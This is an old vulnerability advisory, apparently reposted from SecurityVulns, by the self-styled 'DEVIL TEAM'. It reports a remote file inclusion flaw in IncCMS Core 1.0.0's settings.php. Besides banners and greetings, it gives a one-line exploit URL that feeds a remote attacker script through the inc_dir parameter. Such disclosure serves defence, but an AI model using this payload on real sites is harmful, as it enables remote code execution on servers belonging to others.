IncCMS Core <= 1.0.0 (settings.php) Remote File Include Vulnerability

2006-10-15T00:00:00
ID SECURITYVULNS:DOC:14705
Type securityvulns
Reporter Securityvulns
Modified 2006-10-15T00:00:00

Description

::::::::: :::::::::: ::: ::: ::::::::::: :::
:+: :+: :+: :+: :+: :+: :+:
+:+ +:+ +:+ +:+ +:+ +:+ +:+
+#+ +:+ +#++:++# +#+ +:+ +#+ +#+
+#+ +#+ +#+ +#+ +#+ +#+ +#+

+# #+# #+# #+#+#+# #+# #+#

### ########## ### ########### ##########

::::::::::: :::::::::: ::: :::: ::::
:+: :+: :+: :+: +:+:+: :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+:+ +:+ +#+ +#++:++# +#++:++#++: +#+ +:+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ #+# #+# #+# #+# #+# #+# ### ########## ### ### ### ###

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - - - [DEVIL TEAM THE BEST POLISH TEAM] - - + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - IncCMS Core <= 1.0.0 (settings.php) Remote File Include Vulnerability + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - [Script name: IncCMS Core 1.0.0 - [Script site: http://www.inccms.com/core/ + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - Find by: Kacper (a.k.a Rahim) + - DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam + - Contact: kacper1964@yahoo.pl - or - http://www.rahim.webd.pl/ + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - Special Greetz: DragonHeart ;-) - Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi, mivus - SkD, nukedclx, Ramzes, t3k, dn0d'e, sysios, SpiderZ - - Greetz for all users DEVIL TEAM IRC Channel !! !@ Przyjazni nie da sie zamienic na marne korzysci @! + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - Z Dedykacja dla osoby, - bez ktorej nie mogl bym zyc... - K.C:* J.M (a.k.a Magaja) + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Exploit:

http://www.site.com/[incCMS_path]/inc/settings.php?inc_dir=[evil_script]

DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam